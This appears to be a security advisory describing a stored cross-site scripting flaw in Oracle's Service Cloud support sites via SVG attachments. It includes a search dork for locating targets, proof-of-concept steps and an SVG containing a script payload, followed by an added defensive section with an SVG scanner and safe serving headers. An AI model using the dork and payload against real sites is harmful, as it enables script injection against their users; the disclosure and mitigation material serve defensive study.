# [+] Title : Oracle Integrated Support Platform Service XSS Vulnerability
# [+] Author (Discovered by) : Zunfix
# [+] Team: TurkHackTeam
# [+] Vendor: cloud.oracle.com/service-cloud
# [+] Date : Jul, 10th 2019
# [+] Dork : inurl:/app/answers/list

# [+] Poc : 
        + We search for the dork in a search engine
        + We create an account on the vulnerable site [Register path: /app/utils/create_account]
        + We go to the Ask a question page, attach the svg file containing the exploit code and send the question [Question page: /app/ask]
        + We go to the support history page and open the question we asked from the list [History page: /app/account/questions/list]
        + From our question page, we open the exploit svg file that we added
        + The exploit code runs [Exploit code: <script>alert(123)</script>]

# [+] Svg file source code containing exploit : 
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script>
alert(123)
</script>
</svg>
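
The script runs because the stored SVG attachment is opened as a document in the support site's own origin. The following is an added example, not part of the original advisory or of Oracle's code: an upload-side check for active content in an SVG together with response headers that stop a stored attachment from rendering inline. The function names and the two extra sample files are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Elements that run script or embed HTML inside an SVG document.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
_URL_NOISE = re.compile(r"[\x00-\x20]+")  # browsers ignore these inside a scheme

def local(name):
    """Drop the '{namespace}' prefix ElementTree adds to qualified names."""
    return name.rsplit("}", 1)[-1].lower()

def find_active_content(svg_bytes):
    """Return the reasons an uploaded SVG must not be rendered inline."""
    if b"<!ENTITY" in svg_bytes:  # refuse entity declarations before parsing
        return ["entity declaration"]
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError:
        return ["not well-formed XML"]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for name, value in el.attrib.items():
            attr = local(name)
            if attr.startswith("on"):
                findings.append(f"{attr} handler on <{tag}>")
            if attr == "href" and _URL_NOISE.sub("", value).lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{tag}>")
    return findings

def attachment_headers(filename):
    """Response headers that keep a stored upload from running in the site's origin."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }

# The advisory's SVG (DOCTYPE line omitted) plus two constructed samples.
ADVISORY_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script>
alert(123)
</script>
</svg>"""
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="x()"/>'
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/></svg>'
```

The element and attribute check is a deny-list and cannot be assumed complete, so the headers should be applied to every user-supplied attachment regardless of what the scan reports.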

# [+] Vulnerable Sites E.g :